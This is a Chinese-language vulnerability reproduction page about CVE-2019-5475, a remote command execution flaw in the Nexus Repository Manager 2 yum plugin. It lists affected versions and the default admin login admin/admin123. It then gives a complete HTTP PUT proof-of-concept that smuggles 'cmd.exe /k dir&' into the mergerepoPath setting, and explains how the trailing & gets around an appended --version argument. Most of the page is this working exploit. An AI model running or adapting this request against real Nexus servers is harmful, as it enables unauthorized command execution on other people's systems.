menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 092-Nexus chevron_right 001-CVE-2019-5475 Nexus2 yum插件RCE漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-CVE-2019-5475 Nexus2 yum插件RCE漏洞.md
    1.85 KB / 2021-07-17 00:01:28
        # CVE-2019-5475 Nexus2 yum插件RCE漏洞
    
    ### 一、漏洞简介
    
    该漏洞默认存在部署权限账号,成功登录后可使用“createrepo”或“mergerepo”自定义配置,可触发远程命令执行漏洞
    
    ### 二、漏洞影响
    
    * Nexus Repository Manager OSS <= 2.14.13
    * Nexus Repository Manager Pro <= 2.14.13
    * 限制:admin权限才可触发漏洞
    
    ### 三、复现过程
    
    首先以管理员身份(admin/admin123)登录
    
    然后找到漏洞位置:Capabilities - Yum:Configuration - Settings
    
    ![](images/15891951661802.png)
    
    
    点击 Save 抓包,更改mergerepoPath后的value值
    
    
    ```bash
    C:\\Windows\\System32\\cmd.exe /k dir&
    ```
    
    ![](images/15891951785572.png)
    
    
    此处使用 /k 是因为这样命令执行完会保留进程不退出,而 /c 后执行完会退出;由于给用户提供的命令后面加了一个 --version,所以后面要加个&,&表两个命令同时执行,这样就不会干扰其他命令的执行
    
    Poc如下:
    
    
    ```bash
    PUT /nexus/service/siesta/capabilities/00012bdb034073a3 HTTP/1.1
    Host: 127.0.0.1:8081
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    X-Nexus-UI: true
    Content-Type: application/json
    X-Requested-With: XMLHttpRequest
    Content-Length: 241
    DNT: 1
    Connection: close
    Referer: http://127.0.0.1:8081/nexus/
    Cookie: NXSESSIONID=105c7cb1-a307-43a3-9ff8-9770b5ae3b13
                    
    
    
                
    
                    
    {"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"111"},{"key":"mergerepoPath","value":"C:\\Windows\\System32\\cmd.exe /k dir&"}],"id":"00012bdb034073a3","notes":""}
    ```
    
    
    
    links
    file_download